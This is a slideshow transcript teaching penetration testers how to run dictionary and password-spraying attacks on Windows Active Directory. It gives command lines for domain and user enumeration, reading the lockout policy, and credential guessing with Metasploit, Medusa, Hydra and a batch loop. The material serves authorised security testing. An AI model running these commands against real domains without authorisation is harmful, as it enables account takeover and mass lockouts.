Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Introduction to Windows Dictionary Attacks


Published on

In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered:

Identify domains
Enumerate domain controllers
Enumerate users from domain controllers
Enumerate password policy from domain controllers
Perform dictionary attack

More security blogs by the authors can be found @

Published in: Technology
  • Be the first to comment

Introduction to Windows Dictionary Attacks

  1. 1. Introduction to Windows Dictionary AttacksAuthor: Scott Sutherland
  2. 2. Who am I?Scott Sutherland• Principal Security Consultant @ NetSPI• Over 10 years of consulting experience• Security researcher: Blogs, white papers, tools etc
  3. 3. Presentation Goals• Identify the value of dictionary attacks• Provide new penetration testers with a safe approach to Windows dictionary attacks• Provide security professionals with questions they should be asking their contractors
  4. 4. Before we begin… Dictionary Attack Brute Force Attack
  5. 5. Why dictionary attacks?What are the goals?• Identify accounts configured with weak or default passwords – “It’s human nature”• Use accounts as entry points during penetration testsWhat’s the impact?• Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data• User impersonation
  6. 6. Are There Alternatives?Yes.Approaches typically includes:• Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper• Dumping clear text passwords for interactive sessions with Mimikatz
  7. 7. Dictionary Attacks: Process OverviewWindows Dictionary Attack Process1. Identify domains2. Enumerate domain controllers3. Enumerate domain users4. Enumerate domain lockout policy5. Create a dictionary6. Perform Attack
  8. 8. Identify Domains: MethodsUnauthenticated Methods• DHCP Information• NetBIOS Queries• DNS Queries• Sniffing Network Traffic• Review RDP drop down listsAuthenticated Methods• Review the output of the SET command for “USERDNSDOMAIN”• Review the registry for the default domain
  9. 9. Identify Domains: Tools Method Tools Auth IPCONFIGDHCP Info NoNetBIOS Queries NETSTAT –A <IP> No nmap -sL <IP Range> -oA output_rndsDNS Queries No ./reverseraider -r <IP Range> ./dnswalk perl -dns <domainname> -threads 5 -file <domainame>-dns.output Wireshark (GUI) + Filter for browser trafficSniffing No Network Monitor (GUI) Etherape (GUI) nmap –sS –PN –p3389 <IP Range>RDP Drop Down Then visit with RDP client No
  10. 10. Enumerate DCs: MethodsUnauthenticated Methods• DNS Queries• RPC Queries• Port Scanning• NetBIOS ScanningAuthenticated Methods• NET GROUP commands• LDAP Queries
  11. 11. Enumerate DCs: Tools Methods Tools Auth NSLOOKUP –type=SRV _ldap._tcp.<domain>DNS Queries No NLTEST /DCLIST <domain>RPC Queries FindPDC <domain> <request count> No NMAP –sS –p389,636 –PN <IP Range>Port Scanning No FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTATNetBIOS –A %i NoScanning Net group “Domain Controllers” /domainNET GROUP YesCommand LDAP Administrator (GUI Tool)LDAP Queries Yes Hyena (GUI Tool) & adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” No | gawk -F ” ” “{print $2}” | sort | uniq
  12. 12. Enumerate Domain Users: MethodsUnauthenticated Methods• RPC Queries• SID Brute Forcing• SNMP Queries• LDAP Queries• Sharepoint FuzzingAuthenticated Methods• NET USER command• WMI commands
  13. 13. Enumerate Domain Users: Tools 1 Methods Tools Auth dumpsec.exe /computer=<IP> /rpt=usersonlyRPC /saveas=csv /outfile=domain_users.txt YesEndpoints & enum –N <ip> no enum –U <ip> ruby c:metasploitmsf3msfcliSID Brute auxiliary/scanner/smb/smb_lookupsid YesForcing SMBDomain=. MaxRID=10000 RHOSTS=<IP & Address> E > domain_users.txt no Getacct (GUI) ruby c:metasploitmsf3msfcliSNMP auxiliary/scanner/snmp/snmp_enumusers YesQueries SMBDomain=. RHOSTS=<IP Address> E & Mibbrowser (GUI) no SNMP Walk
  14. 14. Enumerate Domain Users: Tools 2 Methods Tools Auth adfind -b DC=<victim>,DC=<com> -fLDAP Queries “objectcategory=user” -gc | grep -i Yes “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk & -F ” ” “{print $1}”| sort > domain_users.txt no Fuzz parameters with BURP to enumerate domainSharepoint users. Example URL below: YesFuzzing & https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] no Net users /domain > domain_users.txtNET USERS YesCommand wmic /user:<user> /password:<password> /node:<IPWMI address> domain_users.txt YesCommands
  15. 15. Get Domain Lockout Policy: MethodsUnauthenticated Methods• RPC Endpoints LockoutAuthenticated Methods threshold: 5• NET ACCOUNTS Lockout duration: 15 Command Lockout observationWhat does it all mean? window : 15• Threshold, duration, and window
  16. 16. Get Domain Lockout Policy: Tools Methods Tools AuthRPC Queries Enum –P <IP Address> Yes & dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt No NET ACCOUNTSNET YEsACCOUNTSCOMMAND
  17. 17. Create a Dictionary: MethodsClassics Still Work• Blank• Username as password• passwordCommon Formulas = Most Effective• <Password><Number>• <Companyname><Number>• <Season><Year>• <Sports team>Number>Popular Dictionaries• Metasploit dictionaries• Rock you• FuzzDB• John the ripper
  18. 18. Create a Dictionary: Tools Dictionary URLs / Lists Blank passwordClassics Username as password password as password <Password><Number> <Companyname><Number>Formulas <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! the Ripper
  19. 19. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy• General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user• Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3• Wait 5 to 10 minutes beyond the observation window
  20. 20. Perform Dictionary Attack: Tools Tools Commands OS medusa -H hosts.txt -U users.txt -P passwords.txt -Medusa T 20 -t 10 -L -F -M smbnt Linux Easy to use GUI and not CLI that I know of.Bruter Windows ruby c:metasploitmsf3msfcliMetasploit auxiliary/scanner/smb/smb_login THREADS=5 Windowssmb_login BLANK_PASSWORDS=true USER_AS_PASS=true and Linux PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS= E hydra.exe -L users.txt -P passwords.txt -oHydra credentials.txt <ip> smb Windows and Linux FOR /F “tokens=*” %a in (‘type passwords.txt’) doBatch Script net user <ip>IPC$ /user:<user> %a Windows
  21. 21. Conclusions• There is more than one way to do everything!• Enumerate all available options• It’s easy to lockout accounts – respect the password policy • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests